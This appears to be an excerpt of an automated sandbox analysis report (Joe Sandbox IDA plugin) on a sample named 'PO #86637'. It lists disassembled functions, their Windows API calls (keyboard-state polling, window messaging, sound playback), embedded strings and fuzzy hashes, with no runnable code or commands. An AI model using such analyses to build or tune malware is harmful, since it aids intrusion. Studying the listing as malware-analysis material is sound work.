                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                      Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: SendString$_memmove_wcslen
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 369157077-1007645807
                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                      Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32 ref: 00445BF8
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                      • __wcsicoll.LIBCMT ref: 00445C33
                      • __wcsicoll.LIBCMT ref: 00445C4F
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$ClassMessageNameParentSend
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 3125838495-3381328864
                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                      Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$CharNext
                      • String ID:
                      • API String ID: 1350042424-0
                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                      Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                      • _wcscpy.LIBCMT ref: 004787E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 3052893215-2127371420
                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                      Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                      • __swprintf.LIBCMT ref: 0045E7F7
                      • _wprintf.LIBCMT ref: 0045E8B3
                      • _wprintf.LIBCMT ref: 0045E8D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2295938435-2354261254
                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                      Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __swprintf_wcscpy$__i64tow__itow
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 3038501623-2263619337
                      • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                      • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                      Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                      • __swprintf.LIBCMT ref: 0045E5F6
                      • _wprintf.LIBCMT ref: 0045E6A3
                      • _wprintf.LIBCMT ref: 0045E6C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2295938435-8599901
                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                      Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • timeGetTime.WINMM ref: 00443B67
                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                      • SetActiveWindow.USER32(?), ref: 00443BEC
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                      • IsWindow.USER32(?), ref: 00443C3A
                      • EndDialog.USER32(?,00000000), ref: 00443C4C
                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                      • String ID: BUTTON
                      • API String ID: 1834419854-3405671355
                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                      Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                      • LoadStringW.USER32(00000000), ref: 00454040
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • _wprintf.LIBCMT ref: 00454074
                      • __swprintf.LIBCMT ref: 004540A3
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 455036304-4153970271
                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                      Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                      • _memmove.LIBCMT ref: 00467EB8
                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                      • _memmove.LIBCMT ref: 00467F6C
                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                      • String ID:
                      • API String ID: 2170234536-0
                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                      Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00453CE0
                      • SetKeyboardState.USER32(?), ref: 00453D3B
                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                      • GetKeyState.USER32(000000A0), ref: 00453D75
                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                      • GetKeyState.USER32(00000011), ref: 00453DEF
                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                      • GetKeyState.USER32(00000012), ref: 00453E26
                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                      Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                      Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                      • DeleteObject.GDI32(?), ref: 0047151E
                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                      • DeleteObject.GDI32(?), ref: 004715EA
                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
